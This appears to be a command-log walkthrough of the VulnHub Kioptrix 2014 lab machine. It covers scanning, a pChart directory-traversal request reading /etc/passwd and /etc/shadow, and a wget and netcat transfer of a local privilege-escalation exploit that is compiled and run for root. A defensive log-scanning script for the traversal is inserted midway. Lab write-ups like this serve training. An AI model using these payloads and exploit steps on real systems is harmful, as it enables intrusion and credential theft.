VulnHub: Kioptrix: 2014

  1. Network Discovery
nmap -sn 10.0.2.24/24
nmap -Pn 10.0.2.20
nmap -Pn -p1000 10.0.2.20
nmap -A -p22,80,8080 10.0.2.20
nmap --script vuln -p22,80,8080 10.0.2.20
nikto -h http://10.0.2.20
nikto -h http://10.0.2.20:8080
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.20/ -x php,txt,html,sh,cgi -q
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.20:8080/ -x php,txt,html,sh,cgi -q
Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
http://10.0.2.20/pChart2.1.3/examples/index.php
/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/shadow
/usr/local/etc/apache22/httpd.conf
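As an added defender-side example (not part of the original walkthrough), this Python script scans Apache access-log lines for the pChart `Script` parameter traversal used above, percent-decoding repeatedly so double-encoded variants are caught as well. The log lines and the 203.0.113.5 client address are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache access-log lines mirroring the pChart requests on this page;
# they are not taken from the box. 203.0.113.5 is a documentation address.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2024:12:00:01 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=example.drawBar.php HTTP/1.1" 200 5120
203.0.113.5 - - [10/Mar/2024:12:00:02 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd HTTP/1.1" 200 1320
203.0.113.5 - - [10/Mar/2024:12:00:03 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%252f..%252f..%252fetc/shadow HTTP/1.1" 200 980
203.0.113.5 - - [10/Mar/2024:12:00:04 +0000] "GET /index.html HTTP/1.1" 200 152
"""

# Common Log Format prefix: client, identd, user, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

def decode_fully(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded separators (%252f) are caught too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def traversal_script(target: str):
    """Return the decoded Script value when it escapes the examples directory, else None.
    A legitimate pChart example is a bare filename such as example.drawBar.php, so an
    absolute path, a '..' component or a NUL byte means the request reads outside it."""
    parts = urlsplit(target)
    if not parts.path.endswith("/pChart2.1.3/examples/index.php"):
        return None
    for raw in parse_qs(parts.query).get("Script", []):
        script = decode_fully(raw)
        if script.startswith("/") or ".." in script.split("/") or "\x00" in script:
            return script
    return None

def scan_log(text: str) -> list:
    """One finding per request whose Script parameter traverses out of the examples dir."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        script = traversal_script(m["target"])
        if script is not None:
            findings.append({"ip": m["ip"], "ts": m["ts"], "status": int(m["status"]), "script": script})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} status={f['status']} read {f['script']}")
```

A 200 status on such a request is the strongest signal, since the traversal only matters if the file was actually served.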
whoami
/home, /tmp, /var/mail, /var/log
sudo -l
find / -perm -u=s -type f 2>/dev/null
getcap -r / 2>/dev/null
cat /etc/crontab
uname -a
searchsploit -m 28718
python -m SimpleHTTPServer 80
cd /tmp
wget http://10.0.2.27/28718.c
nc -nvlp 1337 < 28718.c
nc -nv 10.0.2.7 1337 > priv.c
gcc priv.c -o priv
./priv
whoami
cd /root
ls -la
cat congrats.txt
